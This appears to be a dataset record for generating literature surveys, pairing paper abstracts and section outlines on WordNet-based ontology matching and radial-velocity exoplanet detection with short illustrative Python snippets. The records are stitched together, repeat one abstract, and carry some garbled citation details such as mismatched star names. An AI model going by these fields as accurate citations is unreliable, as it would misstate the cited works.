paper_content: In this paper, we present a heuristic mapping method and a prototype mapping system that support the process of semi-automatic ontology mapping for the purpose of improving semantic interoperability in heterogeneous systems. The approach is based on the idea of semantic enrichment, i.e. using instance information of the ontology to enrich the original ontology and calculate similarities between concepts in two ontologies. The functional settings for the mapping system are discussed and the evaluation of the prototype implementation of the approach is reported.
--- paper_title: Investigating semantic similarity measures across the Gene Ontology:
paper_content: Motivation: Many bioinformatics data resources not only hold data in the form of sequences, but also as annotation. In the majority of cases, annotation is written as scientific natural language: this is suitable for humans, but not particularly useful for machine processing. Ontologies offer a mechanism by which knowledge can be represented in a form capable of such processing. In this paper we investigate the use of ontological annotation to measure the similarities in knowledge content or ‘semantic similarity’ between entries in a data resource. These allow a bioinformatician to perform a similarity measure over annotation in an analogous manner to those performed over sequences. A measure of semantic similarity for the knowledge component of bioinformatics resources should afford a biologist a new tool in their repertoire of analyses. Results: We present the results from experiments that investigate the validity of using semantic similarity by comparison with sequence similarity. We show a simple extension that enables a semantic search of the knowledge held within sequence databases. Availability: Software available from http://www.russet.
--- paper_title: Semantic Similarity Based on Corpus Statistics and Lexical Taxonomy
paper_content: This paper presents a new approach for measuring semantic similarity/distance between words and concepts. It combines a lexical taxonomy structure with corpus statistical information so that the semantic distance between nodes in the semantic space constructed by the taxonomy can be better quantified with the computational evidence derived from a distributional analysis of corpus data. Specifically, the proposed measure is a combined approach that inherits the edge-based approach of the edge counting scheme, which is then enhanced by the node-based approach of the information content calculation. When tested on a common data set of word pair similarity ratings, the proposed approach outperforms other computational models. It gives the highest correlation value (r = 0.828) with a benchmark based on human similarity judgements, whereas an upper bound (r = 0.885) is observed when human subjects replicate the same task. ---
Title: A Survey of Exploiting WordNet in Ontology Matching Section 1: Introduction Description 1: Provide an overview of the importance of ontologies in the Semantic Web and the need for ontology matching. Introduce the role of WordNet in enhancing similarity measures. Section 2: WordNet Description 2: Describe the structure and components of WordNet, including synsets and various semantic relationships. Discuss the multilingual extension EuroWordNet. Section 3: Exploiting WordNet in Ontology Matching Description 3: Outline the use of WordNet in calculating semantic similarity for ontology matching. Categorize methods into edge-based, information-based statistics, and hybrid methods. Section 4: Edge-based Methods Description 4: Detail various edge-based methods for calculating semantic similarity using WordNet. Include specific algorithms like those proposed by Wu and Palmer, Resnik, and others. Section 5: Information-based Statistics Methods Description 5: Explain information-based statistics methods for semantic similarity, including Resnik's approach and Lin's adaptation. Discuss their application in ontology matching. Section 6: Hybrid Methods Description 6: Discuss combined models that integrate edge-based and information-based approaches. Provide examples such as Jiang and Conrath's model, Rodriguez's approach, and others. Section 7: Applying WordNet Based Semantic Similarity Methods in Ontology Matching Description 7: Describe the preprocessing steps involved in applying WordNet based methods, such as tokenisation, stemming, and stop-word removal. Explain how semantic similarity methods are applied in practical ontology matching scenarios. Section 8: Conclusions Description 8: Summarize the different WordNet-based semantic similarity measures and their applications in ontology matching. Highlight the tools that implement these measures and their effectiveness.
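The edge-based, information-content, and hybrid measures listed in the outline above can be experimented with directly through NLTK's WordNet interface. The following minimal sketch is illustrative only (it is not taken from the cited papers); it assumes the NLTK 'wordnet' and 'wordnet_ic' corpora are installed, and the word pair is an arbitrary example.

# Illustrative comparison of WordNet-based similarity measures with NLTK.
# Assumes the 'wordnet' and 'wordnet_ic' corpora have been downloaded,
# e.g. via nltk.download('wordnet') and nltk.download('wordnet_ic').
from nltk.corpus import wordnet as wn
from nltk.corpus import wordnet_ic

brown_ic = wordnet_ic.ic('ic-brown.dat')          # information content estimated from the Brown corpus
car, bike = wn.synset('car.n.01'), wn.synset('bicycle.n.01')   # arbitrary example pair

print('path (edge counting):      ', car.path_similarity(bike))
print('Wu & Palmer (depth-scaled):', car.wup_similarity(bike))
print('Resnik (IC of subsumer):   ', car.res_similarity(bike, brown_ic))
print('Lin (normalised IC):       ', car.lin_similarity(bike, brown_ic))
print('Jiang & Conrath (hybrid):  ', car.jcn_similarity(bike, brown_ic))

NLTK exposes Jiang and Conrath in its inverse-distance (similarity) form, so higher values mean closer concepts for all five calls.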
Discovering New Worlds: A review of signal processing methods for detecting exoplanets from astronomical radial velocity data [Applications Corner]
10
--- paper_title: Metallicities & Activities of Southern Stars
paper_content: Aims. We present the results from high-resolution spectroscopic measurements to determine metallicities and activities of bright stars in the southern hemisphere. Methods. We measured the iron abundances ([Fe/H]) and chromospheric emission indices (log R'HK) of 353 solar-type stars with V = 7.5−9.5. [Fe/H] abundances are determined using a custom χ² fitting procedure within a large grid of Kurucz model atmospheres. The chromospheric activities were determined by measuring the amount of emission in the cores of the strong Ca II H and K lines. Results. Our comparison of the metallicity sample to other [Fe/H] determinations was found to agree at the ±0.05 dex level for spectroscopic values and at the ±0.1 dex level for photometric values. The distribution of chromospheric activities is described by a bimodal distribution, agreeing with the conclusions from other works. Also an analysis of Maunder minimum status was attempted, and it was found that 6 ± 4 stars in the sample could be in a Maunder minimum phase of their evolution and hence the Sun should only spend a few per cent of its main sequence lifetime in Maunder minimum.
--- paper_title: ELODIE: A spectrograph for accurate radial velocity measurements
paper_content: The fibre-fed echelle spectrograph of Observatoire de Haute-Provence, ELODIE, is presented. This instrument has been in operation since the end of 1993 on the 1.93 m telescope. ELODIE is designed as an updated version of the cross-correlation spectrometer CORAVEL, to perform very accurate radial velocity measurements such as needed in the search, by Doppler shift, for brown dwarfs or giant planets orbiting around nearby stars. In one single exposure a spectrum at a resolution of 42000 (λ/Δλ) ranging from 3906 Å to 6811 Å is recorded on a 1024×1024 CCD. This performance is achieved by using a tan θ = 4 echelle grating and a combination of a prism and a grism as cross-disperser. An automatic on-line data treatment reduces all the ELODIE echelle spectra and computes cross-correlation functions. The instrument design and the data reduction algorithms are described in this paper. The efficiency and accuracy of the instrument and its long term instrumental stability allow us to measure radial velocities with an accuracy better than 15 m s⁻¹ for stars up to 9th magnitude in less than 30 minutes exposure time. Observations of 16th magnitude stars are also possible to measure velocities at about 1 km s⁻¹ accuracy. For classic spectroscopic studies (S/N > 100) 9th magnitude stars can be observed in one hour exposure time.
--- paper_title: Estimation of periods from unequally spaced observations
paper_content: A better estimation of the power spectrum of a time series formed with unequally spaced observations may be obtained by means of a data-compensated discrete Fourier transform. This transform is defined so as to include the uneven spacing of the dates of observation and weighting of the corresponding data. The accurate determination of the peak heights allows one to design harmonic filters and thus to make a more certain choice among peaks of similar height and also to discriminate peaks that are just aliases of other peaks. The theory is applied to simulated time series and also to true observational data.
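As a concrete illustration of the periodogram analysis of unevenly spaced observations discussed in the entries above, the following short Python sketch computes a Lomb-Scargle-type power spectrum with SciPy. The synthetic time series, frequency grid, and parameter values are arbitrary assumptions, not data from the cited papers.

# Periodogram of an unevenly sampled time series (illustrative sketch only).
import numpy as np
from scipy.signal import lombscargle

rng = np.random.default_rng(0)
t = np.sort(rng.uniform(0.0, 200.0, 120))                                # uneven observation epochs [days]
y = 3.0 * np.sin(2 * np.pi * t / 17.0) + rng.normal(0.0, 1.0, t.size)    # 17-day signal plus white noise

periods = np.linspace(2.0, 100.0, 5000)                                  # trial periods [days]
power = lombscargle(t, y - y.mean(), 2 * np.pi / periods)                # lombscargle expects angular frequencies

print(f"strongest peak near P = {periods[np.argmax(power)]:.2f} days")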
--- paper_title: Bayesian Spectrum Analysis and Parameter Estimation paper_content: 1 Introduction.- 2 Single Stationary Sinusoid Plus Noise.- 3 The General Model Equation Plus Noise.- 4 Estimating the Parameters.- 5 Model Selection.- 6 Spectral Estimation.- 7 Applications.- 8 Summary and Conclusions.- A Choosing a Prior Probability.- B Improper Priors as Limits.- C Removing Nuisance Parameters.- D Uninformative Prior Probabilities.- E Computing the "Student t-Distribution". --- paper_title: Studies in astronomical time series analysis. II - Statistical aspects of spectral analysis of unevenly spaced data paper_content: Detection of a periodic signal hidden in noise is frequently a goal in astronomical data analysis. This paper does not introduce a new detection technique, but instead studies the reliability and efficiency of detection with the most commonly used technique, the periodogram, in the case where the observation times are unevenly spaced. This choice was made because, of the methods in current use, it appears to have the simplest statistical behavior. A modification of the classical definition of the periodogram is necessary in order to retain the simple statistical behavior of the evenly spaced case. With this modification, periodogram analysis and least-squares fitting of sine waves to the data are exactly equivalent. Certain difficulties with the use of the periodogram are less important than commonly believed in the case of detection of strictly periodic signals. In addition, the standard method for mitigating these difficulties (tapering) can be used just as well if the sampling is uneven. An analysis of the statistical significance of signal detections is presented, with examples --- paper_title: Keplerian periodogram for Doppler exoplanets detection: optimized computation and analytic significance thresholds paper_content: We consider the so-called Keplerian periodogram, in which the putative detectable signal is modelled by a highly non-linear Keplerian radial velocity function, appearing in Doppler exoplanetary surveys. We demonstrate that for planets on high-eccentricity orbits the Keplerian periodogram is far more efficient than the classic Lomb-Scargle periodogram and even the multiharmonic periodograms, in which the periodic signal is approximated by a truncated Fourier series. We provide new numerical algorithm for computation of the Keplerian periodogram. This algorithm adaptively increases the parameteric resolution where necessary, in order to uniformly cover all local optima of the Keplerian fit. Thanks to this improvement, the algorithm provides more smooth and reliable results with minimized computing demands. We also derive a fast analytic approximation to the false alarm probability levels of the Keplerian periodogram. This approximation has the form $(P z^{3/2} + Q z) W \exp(-z)$, where $z$ is the observed periodogram maximum, $W$ is proportional to the settled frequency range, and the coefficients $P$ and $Q$ depend on the maximum eccentricity to scan. --- paper_title: Period04: A software package to extract multiple frequencies from real data paper_content: Period04, a reworked and extended version of Period98 (Sperl 1998) and PERIOD/ PERDET (Breger 1990), is a new software package especially dedicated to the statistical analysis of large astronomical data sets containing gaps. It offers tools to extract the individual frequencies from the multiperiodic content of time series and provides a flexible interface to perform multiple-frequency fits. 
A review of the functions of Period04 is given. --- paper_title: A dynamically-packed planetary system around GJ667C with three super-Earths in its habitable zone paper_content: Guillen Anglada-Escude, et al, 'A dynamically-packed planetary system around GJ 667J with three super-Earths in its habitable zone', A&A, Vol. 556, A126, first published online 7 August 2013. The version of record is available at doi: http://doi.org/10.1051/0004-6361/201321331. © ESO 2013. Reproduced with permission from Astronomy & Astrophysics. Published by EDP Sciences --- paper_title: PlanetPack: a radial-velocity time-series analysis tool facilitating exoplanets detection, characterization, and dynamical simulations paper_content: Abstract We present PlanetPack, a new software tool that we developed to facilitate and standardize the advanced analysis of radial velocity (RV) data for the goal of exoplanets detection, characterization, and basic dynamical N -body simulations. PlanetPack is a command-line interpreter, that can run either in an interactive mode or in a batch mode of automatic script interpretation. Its major abilities include: (i) advanced RV curve fitting with the proper maximum-likelihood treatment of unknown RV jitter; (ii) user-friendly multi-Keplerian as well as Newtonian N -body RV fits; (iii) use of more efficient maximum-likelihood periodograms that involve the full multi-planet fitting (sometimes called as “residual” or “recursive” periodograms); (iv) easily calculatable parametric 2D likelihood function level contours, reflecting the asymptotic confidence regions; (v) fitting under some useful functional constraints is user-friendly; (vi) basic tasks of short- and long-term planetary dynamical simulation using a fast Everhart-type integrator based on Gauss–Legendre spacings; (vii) fitting the data with red noise (auto-correlated errors); (viii) various analytical and numerical methods for the tasks of determining the statistical significance. It is planned that further functionality may be added to PlanetPack in the future. During the development of this software, a lot of effort was made to improve the calculational speed, especially for CPU-demanding tasks. PlanetPack was written in pure C++ (standard of 1998/2003), and is expected to be compilable and useable on a wide range of platforms. --- paper_title: A new cold sub-Saturnian candidate planet orbiting GJ 221 paper_content: Mikko Tuomi, 'A new cold sub-Saturnian candidate planet orbiting GJ 22', Monthly Notices of the Royal Astronomical Society, Letters, Vol 440: L1-L5, advanced access publication 11 February 2014. The version of record is available at doi: 10.1093/mnrasl/slu014 © 2014 The Author. Published by Oxford University Press on behalf of the Royal Astronomical Society. --- paper_title: An Adaptive Metropolis algorithm paper_content: A proper choice of a proposal distribution for Markov chain Monte Carlo methods, for example for the Metropolis-Hastings algorithm, is well known to be a crucial factor for the convergence of the algorithm. In this paper we introduce an adaptive Metropolis (AM) algorithm, where the Gaussian proposal distribution is updated along the process using the full information cumulated so far. Due to the adaptive nature of the process, the AM algorithm is non-Markovian, but we establish here that it has the correct ergodic properties. 
We also include the results of our numerical tests, which indicate that the AM algorithm competes well with traditional Metropolis-Hastings algorithms, and demonstrate that the AM algorithm is easy to use in practical computation. --- paper_title: The curious case of HD41248. A pair of static signals buried behind red-noise paper_content: Gaining a better understanding of the effects of stellar induced radial velocity noise is critical for the future of exoplanet studies, since the discovery of the lowest-mass planets using this method will require us to go below the intrinsic stellar noise limit. An interesting test case in this respect is that of the southern solar analogue HD41248. The radial velocity time series of this star has been proposed to contain either a pair of signals with periods of around 18 and 25 days, that could be due to a pair of resonant super-Earths, or a single and varying 25 day signal that could arise due to a complex interplay between differential rotation and modulated activity. In this letter we build-up more evidence for the former scenario, showing that the signals are still clearly significant even after more than 10 years of observations and they likely do not change in period, amplitude, or phase as a function of time, the hallmarks of static Doppler signals. We show that over the last two observing seasons this star was more intrinsically active and the noise reddened, highlighting why better noise models are needed to find the lowest amplitude signals, in particular models that consider noise correlations. This analysis shows that there is still sufficient evidence for the existence of two super-Earths on the edge of, or locked into, a 7:5 mean motion resonance orbiting HD41248. --- paper_title: Radial Velocity Fitting Challenge. I. Simulating the data set including realistic stellar radial-velocity signals paper_content: Stellar signals are the main limitation for precise radial-velocity (RV) measurements. These signals arise from the photosphere of the stars. The m/s perturbation created by these signals prevents the detection and mass characterization of small-mass planetary candidates such as Earth-twins. Several methods have been proposed to mitigate stellar signals in RV measurements. However, without precisely knowing the stellar and planetary signals in real observations, it is extremely difficult to test the efficiency of these methods. The goal of the RV fitting challenge is to generate simulated RV data including stellar and planetary signals and to perform a blind test within the community to test the efficiency of the different methods proposed to recover planetary signals despite stellar signals. In this first paper, we describe the simulation used to model the measurements of the RV fitting challenge. Each simulated planetary system includes the signals from instrumental noise, stellar oscillations, granulation, supergranulation, stellar activity, and observed and simulated planetary systems. In addition to RV variations, this simulation also models the effects of instrumental noise and stellar signals on activity observables obtained by HARPS-type high-resolution spectrographs, that is, the calcium activity index log(R'hk) and the bisector span and full width at half maximum of the cross-correlation function. We publish the 15 systems used for the RV fitting challenge including the details about the planetary systems that were injected into each of them (data available at CDS and here: https://rv-challenge.wikispaces.com. 
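Several of the tools cited above (for example the Keplerian periodogram and PlanetPack entries) fit Keplerian radial-velocity curves to the data. As background, the sketch below implements the standard single-planet radial-velocity model, solving Kepler's equation by Newton iteration; the function names and parameter values are illustrative, not code from those packages.

# Standard single-Keplerian radial-velocity model (illustrative sketch).
import numpy as np

def solve_kepler(M, e, tol=1e-10, max_iter=50):
    """Solve Kepler's equation E - e*sin(E) = M for the eccentric anomaly E."""
    E = M.copy()
    for _ in range(max_iter):
        step = (E - e * np.sin(E) - M) / (1.0 - e * np.cos(E))
        E -= step
        if np.max(np.abs(step)) < tol:
            break
    return E

def rv_model(t, P, K, e, omega, t_peri, gamma=0.0):
    """v(t) = gamma + K*[cos(nu + omega) + e*cos(omega)], with nu the true anomaly."""
    M = np.mod(2 * np.pi * (t - t_peri) / P, 2 * np.pi)       # mean anomaly
    E = solve_kepler(M, e)
    nu = 2 * np.arctan2(np.sqrt(1 + e) * np.sin(E / 2),
                        np.sqrt(1 - e) * np.cos(E / 2))
    return gamma + K * (np.cos(nu + omega) + e * np.cos(omega))

t = np.linspace(0.0, 30.0, 200)                                    # arbitrary epochs [days]
rv = rv_model(t, P=5.37, K=12.5, e=0.1, omega=0.4, t_peri=1.0)     # arbitrary parameters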
--- paper_title: Detecting multiple periodicities in observational data with the multifrequency periodogram - II. Frequency Decomposer, a parallelized time-series analysis algorithm paper_content: Abstract This is a parallelized algorithm performing a decomposition of a noisy time series into a number of sinusoidal components. The algorithm analyses all suspicious periodicities that can be revealed, including the ones that look like an alias or noise at a glance, but later may prove to be a real variation. After the selection of the initial candidates, the algorithm performs a complete pass through all their possible combinations and computes the rigorous multifrequency statistical significance for each such frequency tuple. The largest combinations that still survived this thresholding procedure represent the outcome of the analysis. The parallel computing on a graphics processing unit (GPU) is implemented through CUDA and brings a significant performance increase. It is still possible to run FREDEC solely on CPU in the traditional single-threaded mode, when no suitable GPU device is available. To verify the practical applicability of our algorithm, we apply it to an artificial time series as well as to some real-life exoplanetary radial-velocity data. We demonstrate that FREDEC can successfully reveal several known exoplanets. Moreover, it detected a new 9.8-day variation in the Lick data for the five-planet system of 55 Cnc. It might indicate the existence of a small sixth planet in the 3:2 commensurability with the planet 55 Cnc b, although this detection is model-dependent and still needs a detailed verification. --- paper_title: A Gaussian process framework for modelling stellar activity signals in radial velocity data paper_content: To date, the radial velocity (RV) method has been one of the most productive techniques for detecting and confirming extrasolar planetary candidates. Unfortunately, stellar activity can induce RV variations which can drown out or even mimic planetary signals - and it is notoriously difficult to model and thus mitigate the effects of these activity-induced nuisance signals. This is expected to be a major obstacle to using next-generation spectrographs to detect lower mass planets, planets with longer periods, and planets around more active stars. Enter Gaussian processes (GPs) which, we note, have a number of attractive features that make them very well suited to disentangling stellar activity signals from planetary signals. We present here a GP framework we developed to model RV time series jointly with ancillary activity indicators (e.g. bisector velocity spans, line widths, chromospheric activity indices), allowing the activity component of RV time series to be constrained and disentangled from e.g. planetary components. We discuss the mathematical details of our GP framework, and present results illustrating its encouraging performance on both synthetic and real RV datasets, including the publicly-available Alpha Centauri B dataset. --- paper_title: Detecting multiple periodicities in observational data with the multi-frequency periodogram. I. Analytic assessment of the statistical significance paper_content: We consider the "multi-frequency" periodogram, in which the putative signal is modelled as a sum of two or more sinusoidal harmonics with idependent frequencies. 
It is useful in the cases when the data may contain several periodic components, especially when their interaction with each other and with the data sampling patterns might produce misleading results. Although the multi-frequency statistic itself was already constructed, e.g. by G. Foster in his CLEANest algorithm, its probabilistic properties (the detection significance levels) are still poorly known and much of what is deemed known is unrigorous. These detection levels are nonetheless important for the data analysis. We argue that to prove the simultaneous existence of all $n$ components revealed in a multi-periodic variation, it is mandatory to apply at least $2^n-1$ significance tests, most of which involve various multi-frequency statistics, and only $n$ tests are single-frequency ones. The main result of the paper is an analytic estimation of the statistical significance of the frequency tuples that the multi-frequency periodogram can reveal. Using the theory of extreme values of random fields (the generalized Rice method), we find a handy approximation to the relevant false alarm probability. For the double-frequency periodogram this approximation is given by an elementary formula $\frac{\pi}{16} W^2 e^{-z} z^2$, where $W$ stands for a normalized width of the settled frequency range, and $z$ is the observed periodogram maximum. We carried out intensive Monte Carlo simulations to show that the practical quality of this approximation is satisfactory. A similar analytic expression for the general multi-frequency periodogram is also given in the paper, though with a smaller amount of numerical verification.
--- paper_title: Model Order Selection for Complex Sinusoids in the Presence of Unknown Correlated Gaussian Noise
paper_content: We consider the problem of detecting and estimating the amplitudes and frequencies of an unknown number of complex sinusoids based on noisy observations from an unstructured array. In parametric detection problems like this, information theoretic criteria such as minimum description length (MDL) and Akaike information criterion (AIC) have previously been used for joint detection and estimation. In our paper, model selection based on extreme value theory (EVT), which has previously been used for enumerating real sinusoidal components from one-dimensional observations, is generalized to the case of multidimensional complex observations in the presence of noise with an unknown spatial correlation matrix. Unlike the previous work, the likelihood ratios considered in the multidimensional case cannot be addressed using Gaussian random fields. Instead, chi-square random fields associated with the generalized likelihood ratio test are encountered and EVT is used to analyze the model order overestimation probability for a general class of likelihood penalty terms including MDL and AIC, and a novel likelihood penalty term derived based on EVT. Since the exact EVT penalty term involves a Lambert-W function, an approximate penalty term is also derived that is more tractable. We provide threshold signal-to-noise ratios (SNRs) and show that the model order underestimation probability is asymptotically vanishing for EVT and MDL. We also show that MDL and EVT are asymptotically consistent while AIC is not, and that with finite samples, the detection performance of EVT outperforms MDL and AIC. Finally, the accuracy of the derived threshold SNRs is also demonstrated.
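The two entries above concern detecting several sinusoidal components and deciding how many to keep. A much simpler, classical baseline is iterative prewhitening: locate the strongest periodogram peak, fit and subtract a sinusoid at that frequency, and repeat on the residuals. The sketch below illustrates that baseline only; it is not the FREDEC or EVT-based procedure described in the cited papers.

# Toy iterative prewhitening (illustrative baseline, not the cited algorithms).
import numpy as np
from scipy.signal import lombscargle

def strongest_frequency(t, r, freqs):
    power = lombscargle(t, r - r.mean(), 2 * np.pi * freqs)
    return freqs[np.argmax(power)]

def fit_sinusoid(t, r, f):
    # Linear least squares for a*cos(2*pi*f*t) + b*sin(2*pi*f*t) + c.
    X = np.column_stack([np.cos(2 * np.pi * f * t),
                         np.sin(2 * np.pi * f * t),
                         np.ones_like(t)])
    coef, *_ = np.linalg.lstsq(X, r, rcond=None)
    return X @ coef

def prewhiten(t, y, freqs, n_components=3):
    residual, found = y.copy(), []
    for _ in range(n_components):
        f = strongest_frequency(t, residual, freqs)
        residual = residual - fit_sinusoid(t, residual, f)
        found.append(f)
    return found, residual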
--- paper_title: The impact of red noise in radial velocity planet searches: Only three planets orbiting GJ581? paper_content: We perform a detailed analysis of the latest HARPS and Keck radial velocity data for the planet-hosting red dwarf GJ581, which attracted a lot of attention in recent time. We show that these data contain important correlated noise component ("red noise") with the correlation timescale of the order of 10 days. This red noise imposes a lot of misleading effects while we work in the traditional white-noise model. To eliminate these misleading effects, we propose a maximum-likelihood algorithm equipped by an extended model of the noise structure. We treat the red noise as a Gaussian random process with exponentially decaying correlation function. Using this method we prove that: (i) planets b and c do exist in this system, since they can be independently detected in the HARPS and Keck data, and regardless of the assumed noise models; (ii) planet e can also be confirmed independently by the both datasets, although to reveal it in the Keck data it is mandatory to take the red noise into account; (iii) the recently announced putative planets f and g are likely just illusions of the red noise; (iv) the reality of the planet candidate GJ581 d is questionable, because it cannot be detected from the Keck data, and its statistical significance in the HARPS data (as well as in the combined dataset) drops to a marginal level of $\sim 2\sigma$, when the red noise is taken into account. Therefore, the current data for GJ581 really support existence of no more than four (or maybe even only three) orbiting exoplanets. The planet candidate GJ581 d requests serious observational verification. --- paper_title: Bayesian Re-analysis of the Gliese 581 Exoplanet System paper_content: A re-analysis of Gliese 581 HARPS and HIRES precision radial velocity data was carried out with a Bayesian multi-planet Kepler periodogram (from 1 to 6 planets) based on a fusion Markov chain Monte Carlo algorithm. In all cases the analysis included an unknown parameterized stellar jitter noise term. For the HARPS data set the most probable number of planetary signals detected is 5 with a Bayesian false alarm probability of 0.01. These include the $3.1498\pm0.0005$, $5.3687\pm0.0002$, $12.927_{-0.004}^{+0.006}$, and $66.9\pm0.2$d periods reported previously plus a $399_{-16}^{+14}$d period. The orbital eccentricities are $0.0_{-0.0}^{+0.2}$, $0.00_{-0.00}^{+0.02}$, $0.10_{-0.10}^{+0.06}$, $0.33_{-0.10}^{+0.09}$, and $0.02_{-0.02}^{+0.30}$, respectively. The semi-major axis and $M sin i$ of the 5 planets are ($0.0285\pm0.0006$ au, $1.9\pm0.3$M$_{\earth}$), ($0.0406\pm0.0009$ au, $15.7\pm0.7$M$_{\earth}$), ($0.073\pm0.002$ au, $5.3\pm0.4$M$_{\earth}$), ($0.218\pm0.005$ au, $6.7\pm0.8$M$_{\earth}$), and ($0.7\pm0.2$ au, $6.6_{-2.7}^{+2.0}$M$_{\earth}$), respectively. The analysis of the HIRES data set yielded a reliable detection of only the strongest 5.37 and 12.9 day periods. The analysis of the combined HIRES/HARPS data again only reliably detected the 5.37 and 12.9d periods. Detection of 4 planetary signals with periods of 3.15, 5.37, 12.9, and 66.9d was only achieved by including an additional unknown but parameterized Gaussian error term added in quadrature to the HIRES quoted errors. The marginal distribution for the sigma of this additional error term has a well defined peak at $1.8\pm0.4$m s$^{-1}$. It is possible that this additional error arises from unidentified systematic effects. 
We did not find clear evidence for a fifth planetary signal in the combined HIRES/HARPS data set.
--- paper_title: Studies in astronomical time series analysis. II - Statistical aspects of spectral analysis of unevenly spaced data
paper_content: Detection of a periodic signal hidden in noise is frequently a goal in astronomical data analysis. This paper does not introduce a new detection technique, but instead studies the reliability and efficiency of detection with the most commonly used technique, the periodogram, in the case where the observation times are unevenly spaced. This choice was made because, of the methods in current use, it appears to have the simplest statistical behavior. A modification of the classical definition of the periodogram is necessary in order to retain the simple statistical behavior of the evenly spaced case. With this modification, periodogram analysis and least-squares fitting of sine waves to the data are exactly equivalent. Certain difficulties with the use of the periodogram are less important than commonly believed in the case of detection of strictly periodic signals. In addition, the standard method for mitigating these difficulties (tapering) can be used just as well if the sampling is uneven. An analysis of the statistical significance of signal detections is presented, with examples.
--- paper_title: A Hot Uranus Orbiting the Super Metal-rich Star HD77338 and the Metallicity - Mass Connection
paper_content: We announce the discovery of a low-mass planet orbiting the super metal-rich K0V star HD77338 as part of our on-going Calan-Hertfordshire Extrasolar Planet Search. The best fit planet solution has an orbital period of 5.7361 ± 0.0015 days and with a radial velocity semi-amplitude of only 5.96 ± 1.74 m/s, we find a minimum mass of 15.9 (+4.7/−5.3) M⊕. The best fit eccentricity from this solution is 0.09 (+0.25/−0.09), and we find agreement for this data set using a Bayesian analysis and a periodogram analysis. We measure a metallicity for the star of +0.35 ± 0.06 dex, whereas another recent work (Trevisan et al. 2011) finds +0.47 ± 0.05 dex. Thus HD77338b is one of the most metal-rich planet host stars known and the most metal-rich star hosting a sub-Neptune mass planet. We searched for a transit signature of HD77338b but none was detected. We also highlight an emerging trend where metallicity and mass seem to correlate at very low masses, a discovery that would be in agreement with the core accretion model of planet formation. The trend appears to show that for Neptune-mass planets and below, higher masses are preferred when the host star is more metal-rich. Also a lower boundary is apparent in the super metal-rich regime where there are no very low-mass planets yet discovered in comparison to the sub-solar metallicity regime. A Monte Carlo analysis shows that this low-mass planet desert is statistically significant with the current sample of 36 planets at around the 4.5σ level. In addition, results from Kepler strengthen the claim for this paucity of the lowest-mass planets in super metal-rich systems. Finally, this discovery adds to the growing population of low-mass planets around low-mass and metal-rich stars and shows that very low-mass planets can now be discovered with a relatively small number of data points using stable instrumentation.
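The red-noise analysis of GJ581 summarised above models the correlated noise component as a Gaussian process with an exponentially decaying correlation function. In that spirit, the sketch below evaluates a Gaussian log-likelihood for radial-velocity residuals under a white-plus-exponential covariance; the kernel form, parameter names, and values are assumptions made for illustration.

# Gaussian log-likelihood with white + exponentially correlated ("red") noise.
import numpy as np

def red_noise_loglike(t, resid, sigma_white, sigma_red, tau):
    """log N(resid | 0, C), with C_ij = sigma_red^2*exp(-|t_i - t_j|/tau) + sigma_white^2*delta_ij."""
    dt = np.abs(t[:, None] - t[None, :])
    C = sigma_red**2 * np.exp(-dt / tau) + sigma_white**2 * np.eye(t.size)
    L = np.linalg.cholesky(C)                       # white term keeps C positive definite
    alpha = np.linalg.solve(L, resid)
    logdet = 2.0 * np.sum(np.log(np.diag(L)))
    return -0.5 * (alpha @ alpha + logdet + t.size * np.log(2 * np.pi))

t = np.linspace(0.0, 100.0, 80)                                  # arbitrary epochs [days]
resid = np.random.default_rng(1).normal(0.0, 2.0, t.size)        # mock RV residuals [m/s]
print(red_noise_loglike(t, resid, sigma_white=1.5, sigma_red=1.0, tau=10.0))

Maximising such a likelihood over the noise parameters alongside the Keplerian parameters is one way to down-weight correlated noise when assessing candidate signals.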
--- paper_title: Parameter Estimation from Time-Series Data with Correlated Errors: A Wavelet-Based Method and its Application to Transit Light Curves paper_content: We consider the problem of fitting a parametric model to time-series data that are afflicted by correlated noise. The noise is represented by a sum of two stationary Gaussian processes: one that is uncorrelated in time, and another that has a power spectral density varying as $1/f^\gamma$. We present an accurate and fast [O(N)] algorithm for parameter estimation based on computing the likelihood in a wavelet basis. The method is illustrated and tested using simulated time-series photometry of exoplanetary transits, with particular attention to estimating the midtransit time. We compare our method to two other methods that have been used in the literature, the time-averaging method and the residual-permutation method. For noise processes that obey our assumptions, the algorithm presented here gives more accurate results for midtransit times and truer estimates of their uncertainties. ---
Title: Discovering New Worlds: A review of signal processing methods for detecting exoplanets from astronomical radial velocity data [Applications Corner] Section 1: Introduction Description 1: Introduce the concept of exoplanets and the importance of their detection using signal processing methods, particularly focusing on the radial velocity method. Section 2: Radial Velocity Method Description 2: Explain how the radial velocity method works for detecting exoplanets, including the challenges involved and the process of obtaining and analyzing radial velocity data. Section 3: LS Periodogram Description 3: Discuss the Lomb-Scargle (LS) periodogram method used in signal detection, including its implementation, advantages, and limitations. Section 4: Keplerian Periodogram Description 4: Describe the Keplerian periodogram method, highlighting its differences from the LS method, its robustness, and its application in detecting exoplanetary systems. Section 5: Prewhitening Method Description 5: Outline the prewhitening method for searching Doppler signals in radial velocity time series, including how it works and its strengths and weaknesses. Section 6: ML Periodograms Description 6: Explain the Maximum-Likelihood (ML) periodogram method, including its process, advantages, and how it accommodates multiple signals and correlated noise components. Section 7: Bayesian Analysis Description 7: Discuss the Bayesian analysis approach for signal detection, its robustness, flexibility, and the use of Markov chains to assess parameter space. Section 8: MMSE-based Method Description 8: Describe the Minimum Mean Square Error (MMSE)-based method for detecting signals in nonuniformly sampled radial velocity data, including its application and advantages. Section 9: Statistical Significance of Signal Detection Description 9: Elaborate on the importance of statistical validation in signal detection, including methods like False Alarm Probability (FAP) and bootstrap analysis. Section 10: Potential Directions for Future Research Description 10: Highlight future research directions for improving the detection of exoplanets, such as better calibration, understanding stellar activity impacts, and advancements in signal processing methods.
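Section 9 of the outline above refers to the false alarm probability (FAP) and bootstrap analysis. A bare-bones version of the bootstrap idea is sketched below: shuffle the measured values over the fixed observation times and count how often pure shuffling produces a periodogram peak at least as strong as the observed one. The helper names and trial count are illustrative assumptions.

# Bootstrap-style estimate of the false alarm probability of a periodogram peak.
import numpy as np
from scipy.signal import lombscargle

def max_power(t, y, omega):
    return lombscargle(t, y - y.mean(), omega).max()

def bootstrap_fap(t, y, omega, n_trials=1000, seed=0):
    rng = np.random.default_rng(seed)
    observed = max_power(t, y, omega)
    hits = sum(max_power(t, rng.permutation(y), omega) >= observed
               for _ in range(n_trials))
    return hits / n_trials        # fraction of shuffled data sets beating the real peak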
A Survey on Software-Defined VANETs: Benefits, Challenges, and Future Directions
20
